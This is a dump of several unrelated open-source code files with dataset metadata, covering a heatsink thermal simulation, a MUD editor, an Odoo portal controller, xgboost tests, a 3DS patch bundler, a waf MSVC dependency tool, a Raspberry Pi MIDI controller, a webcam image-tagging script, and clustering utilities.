channel.add(heatsink.inside)
walls = c.makeSet("hw")
walls.add(heatsink.minZ)
walls.add(heatsink.maxZ)
walls.add(heatsink.minY)
walls.add(heatsink.maxY)
rad = c.makeSet('rad')
rad.add(heatsink.inside)
rad.add(heatsink.minX)
rad.add(heatsink.maxX)
rad.add(heatsink.minY)
rad.add(heatsink.maxY)
rad.add(heatsink.maxZ)
flux = c.makeSet("flux")
flux.add(heatsink.minZ)
c.meshLinear()
c.sendMesh()
top.sendFilm()
bottom.sendFilm()
channel.sendFilm()
walls.sendFilm()
rad.sendRadiate()
flux.sendFlux()
c.write('send.fbd')
out = subprocess.getoutput('cgx -bg send.fbd')
l_hor = fin_width*height/(2*(fin_width+height))
with fileinput.FileInput('ht.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUT {0:d}; {1:0.3e}'\
.format(int(ta), l_hor), line), end='')
with fileinput.FileInput('hb.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUB {0:d}; {1:0.3e}'\
.format(int(ta), l_hor), line), end='')
with fileinput.FileInput('hw.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUW {0:d}; {1:0.3e}'\
.format(int(ta), length), line), end='')
with fileinput.FileInput('hc.flm', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(F[0-9]).*', r'\1NUC {0:d}; {1:3d}; {2:d}'\
.format(int(ta), int(length*1000), int(fin_spacing*1e6)),
line, ), end='')
with fileinput.FileInput('rad.rad', inplace=True) as fobj:
for line in fobj:
print(re.sub(r'(R[0-9])', r'\1CR', line), end='')
case_deck = '''\
*INCLUDE, INPUT=all.msh
*MATERIAL, Name=Aluminium
*CONDUCTIVITY
%f,0.
*SOLID SECTION, Elset=Eall, Material=Aluminium
*PHYSICAL CONSTANTS,ABSOLUTE ZERO=-273.15,STEFAN BOLTZMANN=5.669E-8
*INITIAL CONDITIONS,TYPE=TEMPERATURE
Nall, %f
*AMPLITUDE, NAME=Aflux
0., %f
*AMPLITUDE, NAME=AinfTemp
0., %f
*AMPLITUDE, NAME=ARad
0., %f
*STEP
*HEAT TRANSFER,STEADY STATE
*DFLUX, AMPLITUDE=Aflux
*INCLUDE, INPUT=flux.dfl
*FILM
*INCLUDE, INPUT=hb.flm
*INCLUDE, INPUT=ht.flm
*INCLUDE, INPUT=hw.flm
*INCLUDE, INPUT=hc.flm
*RADIATE, AMPLITUDE=AinfTemp, RADIATION AMPLITUDE=ARad
*INCLUDE, INPUT=rad.rad
*EL FILE
HFL
*NODE FILE
NT,RFL
*END STEP''' % (conductivity, ta, flux_density, ta, emissivity)
with open('case.inp', 'w') as fobj:
fobj.write(case_deck)
out = subprocess.getoutput('../../application/ccx case')
eval_fbd = '''\
read case.frd
ds 1 e 1'''
with open('eval.fbd', 'w') as fobj:
fobj.write(eval_fbd)
out = subprocess.getoutput('cgx -bg eval.fbd | grep max')
return float(out[5:17])
#for n in range(2,20):
if True:
n = 9
t = heatSinkTemp(
length = 0.113,
width = 0.075,
height = 0.026,
n_fins = 9,
fin_width = 2.2e-3,
base_width = 11e-3,
conductivity = 120.,
ta = 20.,
emissivity = 0.1,
flux = 14.,
)
print(n, t)
|
gpl-2.0
| 7,893,655,362,739,145,000
| 23.548387
| 73
| 0.583443
| false
| 2.721745
| false
| false
| false
|
stormi/tsunami
|
src/primaires/pnj/editeurs/pedit/supprimer.py
|
1
|
2851
|
# -*-coding:Utf-8 -*
# Copyright (c) 2013 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le contexte éditeur Supprimer"""
from primaires.interpreteur.editeur.supprimer import Supprimer
class NSupprimer(Supprimer):
"""Classe définissant le contexte éditeur 'supprimer'.
Ce contexte permet spécifiquement de supprimer un prototype de PNJ.
"""
def interpreter(self, msg):
"""Interprétation du contexte"""
msg = msg.lower()
prototype = self.objet
if msg == "oui":
objet = type(self).importeur
for nom in self.action.split("."):
objet = getattr(objet, nom)
nb_objets = len(prototype.pnj)
if nb_objets > 0:
s = nb_objets > 1 and "s" or ""
nt = nb_objets > 1 and "nt" or ""
self.pere << "|err|{} PNJ{s} existe{nt} modelé{s} sur ce " \
"prototype. Opération annulée.|ff|".format(nb_objets,
s=s, nt=nt)
self.migrer_contexte(self.opts.rci_ctx_prec)
else:
objet(self.objet.cle)
self.fermer()
self.pere << self.confirme
elif msg == "non":
self.migrer_contexte(self.opts.rci_ctx_prec)
else:
self.pere << "|err|Choix invalide.|ff|"
|
bsd-3-clause
| 1,578,359,433,482,653,200
| 41.432836
| 79
| 0.669012
| false
| 3.894521
| false
| false
| false
|
tvtsoft/odoo8
|
addons/website_portal/controllers/main.py
|
1
|
5029
|
# -*- coding: utf-8 -*-
import datetime
from openerp import http
from openerp.http import request
from openerp import tools
from openerp.tools.translate import _
class website_account(http.Controller):
@http.route(['/my', '/my/home'], type='http', auth="public", website=True)
def account(self):
partner = request.env.user.partner_id
values = {
'date': datetime.date.today().strftime('%Y-%m-%d')
}
res_sale_order = request.env['sale.order']
res_invoices = request.env['account.invoice']
quotations = res_sale_order.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['sent', 'cancel'])
])
orders = res_sale_order.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['progress', 'manual', 'shipping_except', 'invoice_except', 'done'])
])
invoices = res_invoices.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['open', 'paid', 'cancelled'])
])
values.update({
'quotations': quotations,
'orders': orders,
'invoices': invoices
})
# get customer sales rep
if partner.user_id:
sales_rep = partner.user_id
else:
sales_rep = False
values.update({
'sales_rep': sales_rep,
'company': request.website.company_id,
'user': request.env.user
})
return request.website.render("website_portal.account", values)
@http.route(['/my/orders/<int:order>'], type='http', auth="user", website=True)
def orders_followup(self, order=None):
partner = request.env['res.users'].browse(request.uid).partner_id
domain = [
('partner_id.id', '=', partner.id),
('state', 'not in', ['draft', 'cancel']),
('id', '=', order)
]
order = request.env['sale.order'].search(domain)
invoiced_lines = request.env['account.invoice.line'].search([('invoice_id', 'in', order.invoice_ids.ids)])
order_invoice_lines = {il.product_id.id: il.invoice_id for il in invoiced_lines}
return request.website.render("website_portal.orders_followup", {
'order': order.sudo(),
'order_invoice_lines': order_invoice_lines,
})
@http.route(['/my/account'], type='http', auth='user', website=True)
def details(self, redirect=None, **post):
partner = request.env['res.users'].browse(request.uid).partner_id
values = {
'error': {},
'error_message': []
}
if post:
error, error_message = self.details_form_validate(post)
values.update({'error': error, 'error_message': error_message})
values.update(post)
if not error:
post.update({'zip': post.pop('zipcode', '')})
partner.sudo().write(post)
if redirect:
return request.redirect(redirect)
return request.redirect('/my/home')
countries = request.env['res.country'].sudo().search([])
states = request.env['res.country.state'].sudo().search([])
values.update({
'partner': partner,
'countries': countries,
'states': states,
'has_check_vat': hasattr(request.env['res.partner'], 'check_vat'),
'redirect': redirect,
})
return request.website.render("website_portal.details", values)
def details_form_validate(self, data):
error = dict()
error_message = []
mandatory_billing_fields = ["name", "phone", "email", "street2", "city", "country_id"]
# Validation
for field_name in mandatory_billing_fields:
if not data.get(field_name):
error[field_name] = 'missing'
# email validation
if data.get('email') and not tools.single_email_re.match(data.get('email')):
error["email"] = 'error'
error_message.append(_('Invalid Email! Please enter a valid email address.'))
# vat validation
if data.get("vat") and hasattr(request.env["res.partner"], "check_vat"):
if request.website.company_id.vat_check_vies:
# force full VIES online check
check_func = request.env["res.partner"].vies_vat_check
else:
# quick and partial off-line checksum validation
check_func = request.env["res.partner"].simple_vat_check
vat_country, vat_number = request.env["res.partner"]._split_vat(data.get("vat"))
if not check_func(vat_country, vat_number): # simple_vat_check
error["vat"] = 'error'
# error message for empty required fields
if [err for err in error.values() if err == 'missing']:
error_message.append(_('Some required fields are empty.'))
return error, error_message
|
agpl-3.0
| -6,674,752,753,006,959,000
| 37.098485
| 114
| 0.552993
| false
| 4.085297
| false
| false
| false
|
tks0123456789/XGB_experiments
|
test_colsample_bylevel.py
|
1
|
2864
|
import xgboost as xgb
from sklearn.datasets import make_classification
n = 2 ** 15
X, y = make_classification(n_samples=n+1, n_features=10, n_informative=5, n_redundant=5,
shuffle=True, random_state=123)
param = {'objective':'binary:logistic','tree_method':'approx',
'eval_metric':'logloss','seed':123}
print('num_row:%d tree_method:%s' % (n+1, 'approx'))
dtrain = xgb.DMatrix(X, y)
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
print('num_row:%d tree_method:%s' % (n, 'approx'))
dtrain = xgb.DMatrix(X[:n], y[:n])
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
print('num_row:%d tree_method:%s' % (n+1, 'exact'))
param['tree_method'] = 'exact'
dtrain = xgb.DMatrix(X, y)
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
"""
num_row:32769 tree_method:approx
colsample_bylevel:1.00
[02:55:11] Tree method is selected to be 'approx'
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
colsample_bylevel:0.10
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
colsample_bylevel:0.01
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
num_row:32768 tree_method:approx
colsample_bylevel:1.00
[02:55:44] Tree method is selected to be 'approx'
[02:55:44] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 118 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.504609
colsample_bylevel:0.10
[02:55:44] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 114 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.546038
colsample_bylevel:0.01
[02:55:44] dmlc-core/include/dmlc/logging.h:235: [02:55:44] src/tree/updater_colmaker.cc:637: Check failed: (n) > (0) colsample_bylevel is too small that no feature can be included
num_row:32769 tree_method:exact
colsample_bylevel:1.00
[03:04:47] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 118 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.504607
colsample_bylevel:0.10
[03:04:47] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 114 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.546035
colsample_bylevel:0.01
[03:04:47] dmlc-core/include/dmlc/logging.h:235: [03:04:47] src/tree/updater_colmaker.cc:637: Check failed: (n) > (0) colsample_bylevel is too small that no feature can be included
"""
|
mit
| 2,984,193,907,683,911,700
| 42.393939
| 180
| 0.693785
| false
| 2.534513
| false
| false
| false
|
Shadowtrance/CakesForeveryWan
|
patches/bundle.py
|
1
|
3840
|
from __future__ import print_function
from sys import argv, exit, stderr
from os import mkdir, makedirs, chdir, system, getcwd
from os.path import getsize
from re import search
from json import loads
from struct import pack
from errno import EEXIST
if len(argv) < 5:
print("Usage: bundle.py <info json> <assembly for patches> <build dir> <out dir>", file=stderr)
exit(1)
info = loads(open(argv[1]).read())
patches_file = open(argv[2]).read()
dir_build = argv[3]
dir_out = argv[4]
dir_top = getcwd()
console_dict = {
"o3ds": 0,
"n3ds": 1
}
type_dict = {
"NATIVE_FIRM": 0,
"TWL_FIRM": 1,
"AGB_FIRM": 2
}
options_dict = {
"keyx": 0b00000001,
"emunand": 0b00000010,
"save": 0b00000100
}
for version in info["version_specific"]:
patches = []
patch_count = len(info["patches"])
verdir_build = dir_build + "/" + version["console"] + "-" + version["version"]
verdir_out = dir_out + "/" + version["console"] + "-" + version["version"]
verfile = patches_file
# Create the patches array based on the global and the version-specific array.
for index in range(patch_count):
patch = {}
for array in [info["patches"][index], version["patches"][index]]:
for patch_info in array:
patch[patch_info] = array[patch_info]
patches.append(patch)
# Set the offset right for the patches
for patch in patches:
match = search("(.create.*[\"|']%s[\"|'].*)" % patch["name"], verfile)
if not match:
print("Couldn't find where %s is created." % patch["name"], file=stderr)
exit(1)
toreplace = match.group(0)
replaceby = ".create \"%(name)s\", %(offset)s\n.org %(offset)s" % patch
verfile = verfile.replace(toreplace, replaceby)
# Set the version-specific variables
if "variables" in version:
vartext = ""
for variable in version["variables"]:
vartext += ".definelabel %s, %s\n" % (variable, version["variables"][variable])
verfile = verfile.replace("#!variables\n", vartext)
# Build dir for this version
try:
mkdir(verdir_build)
except OSError as ex:
if ex.errno == EEXIST:
pass
else:
raise
chdir(verdir_build)
# Compile it
open("patches.s", "w").write(verfile)
if system("armips patches.s"):
print("Couldn't compile version %s for some reason." % version["version"], file=stderr)
exit(1)
# Bake the cake
# What kind of cake is it?
cake_type = console_dict[version["console"]] << 4 | (type_dict[info["type"]] & 0xF)
# Create the header
cake_header = pack("BBBB", patch_count, int(version["version"], 0), cake_type, len(info["description"]) + 5)
cake_header += (info["description"] + '\0').encode()
# Create the patch headers
patch_header_len = 13
cur_offset = len(cake_header) + patch_header_len * patch_count
for patch in patches:
options = 0
if "options" in patch:
for option in patch["options"]:
if option in options_dict:
options |= options_dict[option]
else:
print("I don't know what option %s means." % option, file=stderr)
exit(1)
patch_len = getsize(patch["name"])
cake_header += pack("IIIB", int(patch["offset"], 0), cur_offset, patch_len, options)
cur_offset += patch_len
# Append the patches
cake = cake_header
for patch in patches:
cake += open(patch["name"], "rb").read()
chdir(dir_top)
try:
makedirs(verdir_out)
except OSError as ex:
if ex.errno == EEXIST:
pass
else:
raise
open(verdir_out + "/" + info["name"] + ".cake", "wb").write(cake)
|
gpl-3.0
| -1,199,622,376,286,306,800
| 29.23622
| 112
| 0.580729
| false
| 3.56546
| false
| false
| false
|
hlange/LogSoCR
|
.waf/waflib/extras/msvcdeps.py
|
1
|
10082
|
#!/usr/bin/env python
# encoding: utf-8
# Copyright Garmin International or its subsidiaries, 2012-2013
'''
Off-load dependency scanning from Python code to MSVC compiler
This tool is safe to load in any environment; it will only activate the
MSVC exploits when it finds that a particular taskgen uses MSVC to
compile.
Empirical testing shows about a 10% execution time savings from using
this tool as compared to c_preproc.
The technique of gutting scan() and pushing the dependency calculation
down to post_run() is cribbed from gccdeps.py.
'''
import os
import sys
import tempfile
import threading
from waflib import Context, Errors, Logs, Task, Utils
from waflib.Tools import c_preproc, c, cxx, msvc
from waflib.TaskGen import feature, before_method
lock = threading.Lock()
nodes = {} # Cache the path -> Node lookup
PREPROCESSOR_FLAG = '/showIncludes'
INCLUDE_PATTERN = 'Note: including file:'
# Extensible by outside tools
supported_compilers = ['msvc']
@feature('c', 'cxx')
@before_method('process_source')
def apply_msvcdeps_flags(taskgen):
if taskgen.env.CC_NAME not in supported_compilers:
return
for flag in ('CFLAGS', 'CXXFLAGS'):
if taskgen.env.get_flat(flag).find(PREPROCESSOR_FLAG) < 0:
taskgen.env.append_value(flag, PREPROCESSOR_FLAG)
# Figure out what casing conventions the user's shell used when
# launching Waf
(drive, _) = os.path.splitdrive(taskgen.bld.srcnode.abspath())
taskgen.msvcdeps_drive_lowercase = drive == drive.lower()
def path_to_node(base_node, path, cached_nodes):
# Take the base node and the path and return a node
# Results are cached because searching the node tree is expensive
# The following code is executed by threads, it is not safe, so a lock is needed...
if getattr(path, '__hash__'):
node_lookup_key = (base_node, path)
else:
# Not hashable, assume it is a list and join into a string
node_lookup_key = (base_node, os.path.sep.join(path))
try:
lock.acquire()
node = cached_nodes[node_lookup_key]
except KeyError:
node = base_node.find_resource(path)
cached_nodes[node_lookup_key] = node
finally:
lock.release()
return node
'''
Register a task subclass that has hooks for running our custom
dependency calculations rather than the C/C++ stock c_preproc
method.
'''
def wrap_compiled_task(classname):
derived_class = type(classname, (Task.classes[classname],), {})
def post_run(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).post_run()
if getattr(self, 'cached', None):
return Task.Task.post_run(self)
bld = self.generator.bld
unresolved_names = []
resolved_nodes = []
lowercase = self.generator.msvcdeps_drive_lowercase
correct_case_path = bld.path.abspath()
correct_case_path_len = len(correct_case_path)
correct_case_path_norm = os.path.normcase(correct_case_path)
# Dynamically bind to the cache
try:
cached_nodes = bld.cached_nodes
except AttributeError:
cached_nodes = bld.cached_nodes = {}
for path in self.msvcdeps_paths:
node = None
if os.path.isabs(path):
# Force drive letter to match conventions of main source tree
drive, tail = os.path.splitdrive(path)
if os.path.normcase(path[:correct_case_path_len]) == correct_case_path_norm:
# Path is in the sandbox, force it to be correct. MSVC sometimes returns a lowercase path.
path = correct_case_path + path[correct_case_path_len:]
else:
# Check the drive letter
if lowercase and (drive != drive.lower()):
path = drive.lower() + tail
elif (not lowercase) and (drive != drive.upper()):
path = drive.upper() + tail
node = path_to_node(bld.root, path, cached_nodes)
else:
base_node = bld.bldnode
# when calling find_resource, make sure the path does not begin by '..'
path = [k for k in Utils.split_path(path) if k and k != '.']
while path[0] == '..':
path = path[1:]
base_node = base_node.parent
node = path_to_node(base_node, path, cached_nodes)
if not node:
raise ValueError('could not find %r for %r' % (path, self))
else:
if not c_preproc.go_absolute:
if not (node.is_child_of(bld.srcnode) or node.is_child_of(bld.bldnode)):
# System library
Logs.debug('msvcdeps: Ignoring system include %r', node)
continue
if id(node) == id(self.inputs[0]):
# Self-dependency
continue
resolved_nodes.append(node)
bld.node_deps[self.uid()] = resolved_nodes
bld.raw_deps[self.uid()] = unresolved_names
try:
del self.cache_sig
except AttributeError:
pass
Task.Task.post_run(self)
def scan(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).scan()
resolved_nodes = self.generator.bld.node_deps.get(self.uid(), [])
unresolved_names = []
return (resolved_nodes, unresolved_names)
def sig_implicit_deps(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).sig_implicit_deps()
try:
return Task.Task.sig_implicit_deps(self)
except Errors.WafError:
return Utils.SIG_NIL
def exec_response_command(self, cmd, **kw):
# exec_response_command() is only called from inside msvc.py anyway
assert self.env.CC_NAME in supported_compilers
# Only bother adding '/showIncludes' to compile tasks
if isinstance(self, (c.c, cxx.cxx)):
try:
# The Visual Studio IDE adds an environment variable that causes
# the MS compiler to send its textual output directly to the
# debugging window rather than normal stdout/stderr.
#
# This is unrecoverably bad for this tool because it will cause
# all the dependency scanning to see an empty stdout stream and
# assume that the file being compiled uses no headers.
#
# See http://blogs.msdn.com/b/freik/archive/2006/04/05/569025.aspx
#
# Attempting to repair the situation by deleting the offending
# envvar at this point in tool execution will not be good enough--
# its presence poisons the 'waf configure' step earlier. We just
# want to put a sanity check here in order to help developers
# quickly diagnose the issue if an otherwise-good Waf tree
# is then executed inside the MSVS IDE.
assert 'VS_UNICODE_OUTPUT' not in kw['env']
tmp = None
# This block duplicated from Waflib's msvc.py
if sys.platform.startswith('win') and isinstance(cmd, list) and len(' '.join(cmd)) >= 8192:
program = cmd[0]
cmd = [self.quote_response_command(x) for x in cmd]
(fd, tmp) = tempfile.mkstemp()
os.write(fd, '\r\n'.join(i.replace('\\', '\\\\') for i in cmd[1:]).encode())
os.close(fd)
cmd = [program, '@' + tmp]
# ... end duplication
self.msvcdeps_paths = []
kw['env'] = kw.get('env', os.environ.copy())
kw['cwd'] = kw.get('cwd', os.getcwd())
kw['quiet'] = Context.STDOUT
kw['output'] = Context.STDOUT
out = []
try:
raw_out = self.generator.bld.cmd_and_log(cmd, **kw)
ret = 0
except Errors.WafError as e:
raw_out = e.stdout
ret = e.returncode
for line in raw_out.splitlines():
if line.startswith(INCLUDE_PATTERN):
inc_path = line[len(INCLUDE_PATTERN):].strip()
Logs.debug('msvcdeps: Regex matched %s', inc_path)
self.msvcdeps_paths.append(inc_path)
else:
out.append(line)
# Pipe through the remaining stdout content (not related to /showIncludes)
if self.generator.bld.logger:
self.generator.bld.logger.debug('out: %s' % os.linesep.join(out))
else:
sys.stdout.write(os.linesep.join(out) + os.linesep)
finally:
if tmp:
try:
os.remove(tmp)
except OSError:
pass
return ret
else:
# Use base class's version of this method for linker tasks
return super(derived_class, self).exec_response_command(cmd, **kw)
def can_retrieve_cache(self):
# msvcdeps and netcaching are incompatible, so disable the cache
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).can_retrieve_cache()
self.nocache = True # Disable sending the file to the cache
return False
derived_class.post_run = post_run
derived_class.scan = scan
derived_class.sig_implicit_deps = sig_implicit_deps
derived_class.exec_response_command = exec_response_command
derived_class.can_retrieve_cache = can_retrieve_cache
for k in ('c', 'cxx'):
wrap_compiled_task(k)
|
agpl-3.0
| 2,727,420,422,639,477,000
| 37.480916
| 111
| 0.573696
| false
| 4.200833
| false
| false
| false
|
Ppamo/raspi-noisebox-control
|
noise-control.py
|
1
|
2463
|
BLINKING_RATE_READY = 1.5
BLINKING_RATE_WAITING = 0.1
BLINKING_RATE_LOADING = 0.3
PIN_BUTTON=3
PIN_BLUE=23
PIN_RED=24
import os,sys,time,signal,subprocess,json
import rtmidi_python as rtmidi
import RPi.GPIO as GPIO
midi_in = [rtmidi.MidiIn()]
attached = set()
attached.add(midi_in[0].ports[0])
p = None
with open('noise-control.json') as map_file:
map = json.load(map_file)
def button_callback(channel):
kill_cmd(None)
GPIO.cleanup()
log('shutdown now!')
os.system("shutdown now -h")
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(PIN_RED, GPIO.OUT)
GPIO.setup(PIN_BLUE, GPIO.OUT)
GPIO.setup(PIN_BUTTON, GPIO.IN, GPIO.PUD_UP)
GPIO.add_event_detect(PIN_BUTTON, GPIO.FALLING, callback=button_callback,bouncetime=500)
def set_led_status(status):
GPIO.output(PIN_RED, status)
GPIO.output(PIN_BLUE, not status)
return not status
def log(message):
print message
def signal_handler(signum, frame):
global blinking_rate
if signum == signal.SIGUSR1:
log ('Child ready')
blinking_rate = BLINKING_RATE_READY
elif signum == signal.SIGUSR2:
log ('Child busy')
blinking_rate = BLINKING_RATE_WAITING
elif signum == signal.SIGINT or signum == signal.SIGQUIT:
log ('good bye!')
GPIO.cleanup()
sys.exit(0)
def exec_cmd(device):
global p
device_name = device.split(' ')[0]
if device_name in map:
p = subprocess.Popen(args = map[device_name])
def kill_cmd(device):
global p
log('killing %d' % p.pid)
if not p is None and p.poll() is None:
p.send_signal(signal.SIGINT)
time.sleep(0.5)
def attach_device(port):
log('attaching ' + port)
global blinking_rate
blinking_rate = BLINKING_RATE_LOADING
attached.add(port)
exec_cmd(port)
def dettach_device(port):
log('dettaching ' + port)
global blinking_rate
blinking_rate = BLINKING_RATE_LOADING
log('loading')
kill_cmd(port)
attached.remove(port)
log('loading')
blinking_rate = BLINKING_RATE_LOADING
blinking = False
signal.signal(signal.SIGUSR1, signal_handler)
signal.signal(signal.SIGUSR2, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
while True:
# if something has changed in midi ports
if len(set(midi_in[0].ports) ^ attached) > 0:
ports = set(midi_in[0].ports)
# attach if there is new elements
for i in ports - attached:
attach_device(i)
# dettach if necessary
for i in attached - ports:
dettach_device(i)
blinking = set_led_status(blinking)
time.sleep(blinking_rate)
|
mit
| -6,005,659,446,975,328,000
| 22.457143
| 88
| 0.723508
| false
| 2.668472
| false
| false
| false
|
rvictorino/webeye
|
img_recogn.py
|
1
|
3053
|
from clarifai import rest
from clarifai.rest import ClarifaiApp
import argparse
from urlparse import urlparse
import urllib2
import urllib
import json
import cam_discovery
MAPS_API_KEY = ""
OUTPUT_FILE_PATH = "/var/www/html/webeye/webeye.js"
def get_url_list_from_file(file_path):
file_to_read=open(file_path,'r')
return file_to_read.readlines()
def get_location(uri):
domain = urlparse(uri).netloc.split(":")[0]
result = urllib2.urlopen("http://ip-api.com/json/" + str(domain)).read()
parsed = json.loads(result)
return {"lat": parsed["lat"], "lon": parsed["lon"]}
def generate_map(located_images_list):
url_base = "https://maps.googleapis.com/maps/api/staticmap?"
params = {"key": MAPS_API_KEY, "size": "500x400"}
# generate markers
markers = []
for located_img in located_images_list:
loc = located_img["location"]
markers.append("markers=color:blue%7Clabel:M%7C{0},{1}".format(loc["lat"], loc["lon"]))
final_url = url_base + urllib.urlencode(params) + "&" + "&".join(markers)
return final_url
def generate_JSON_file(located_images_list):
dest_file = open(OUTPUT_FILE_PATH, 'w')
json_data = json.dumps(located_images_list)
print >> dest_file, "var webeye = " + json_data
dest_file.close()
def remove_port_from_url(url):
parsed_url = urlparse(url)
if parsed_url.port == 80:
return parsed_url.scheme + "://" + parsed_url.netloc[:-3] + parsed_url.path
return parsed_url.geturl()
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", help="url to the image to predict")
group.add_argument("-f", help="path to file containing list of image urls")
group.add_argument("-n", type=int, default=6, help="number of url to import")
parser.add_argument("--static", action='store_true', help="output a google static map url")
args = parser.parse_args()
# parse arguments: one url or a list within a file ?
if args.u is not None:
url_list = [args.u]
elif args.f is not None:
url_list = get_url_list_from_file(args.f)
else:
url_list = cam_discovery.get_best_cam_urls(args.n)
# init ClarifAi app
print("Connecting to ClarifAi")
app = ClarifaiApp("", "")
model = app.models.get("general-v1.3")
geo_data = []
# parse each url
for img_url in url_list:
geo_concept = {}
img_url = remove_port_from_url(img_url)
print(img_url)
# get image url
geo_concept["url"] = img_url
# get lat / lon from IP or domain
geo_concept["location"] = get_location(img_url)
# get concepts in image
geo_concept["concepts"] = []
result = model.predict_by_url(url=img_url)
for concept in result["outputs"][0]["data"]["concepts"]:
print("{0:s}: {1:.2f}%".format(concept["name"], concept["value"]*100))
geo_concept["concepts"].append({"concept": str(concept["name"]), "probability": concept["value"]*100})
# feed the list
geo_data.append(geo_concept)
#TODO: use these data to generate a dynamic google map, including concepts data as tooltips
if args.static:
map_url = generate_map(geo_data)
print(map_url)
else:
# dynamic map
generate_JSON_file(geo_data)
|
gpl-3.0
| -3,981,476,711,404,548,000
| 27.53271
| 104
| 0.697674
| false
| 2.885633
| false
| false
| false
|
twankim/weaksemi
|
utils.py
|
1
|
7546
|
# -*- coding: utf-8 -*-
# @Author: twankim
# @Date: 2017-05-05 20:22:13
# @Last Modified by: twankim
# @Last Modified time: 2017-10-26 03:25:34
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
def accuracy(y_true,y_pred):
return 100*np.sum(y_true==y_pred)/float(len(y_true))
def mean_accuracy(y_true,y_pred):
labels = np.unique(y_true)
accuracy = np.zeros(len(labels))
hamming = y_true==y_pred
accuracy = [100*np.sum(hamming[y_true==label])/float(np.sum(y_true==label)) \
for label in labels]
return np.mean(accuracy)
def error(y_true,y_pred):
return 100*np.sum(y_true!=y_pred)/float(len(y_true))
def mean_error(y_true,y_pred):
labels = np.unique(y_true)
num_error = np.zeros(len(labels))
hamming = y_true!=y_pred
error = [100*np.sum(hamming[y_true==label])/float(np.sum(y_true==label)) \
for label in labels]
return np.mean(error)
# Find best matching permutation of y_pred clustering
# Also need to change mpp of algorithm
def find_permutation(dataset,algo):
# Calculate centers of original clustering
label_org = list(np.unique(dataset.y))
means_org = [np.mean(dataset.X[dataset.y==label,:],axis=0) for label in label_org]
labels_map = {} # Map from algorithm's label to true label
# Initialize label mapping
for label in xrange(algo.k+1):
labels_map[label] = 0
if len(algo.labels)==0:
return algo.y
for label,mpp in zip(algo.labels,algo.mpps):
# Calculate distance between estimated center and true centers
dist = [np.linalg.norm(mpp-mean_org) for mean_org in means_org]
# Assign true cluster label to the algorithm's label
idx_best = np.argmin(dist)
labels_map[label] = label_org[idx_best]
# Remove assigned label from the list
del means_org[idx_best]
del label_org[idx_best]
return [labels_map[y] for y in algo.y]
# Plot eta v.s. evaluation
# res: rep x len(qs) x len(etas)
def print_eval(eval_metric,res,etas,fname,
is_sum=False,weak='random',params=None):
assert weak in ['random','local','global'], \
"weak must be in ['random','local','global']"
if weak == 'random':
i_name = 'q'
t_name = weak
else:
i_name = 'c_dist'
t_name = weak +' distance'
rep = res.shape[0]
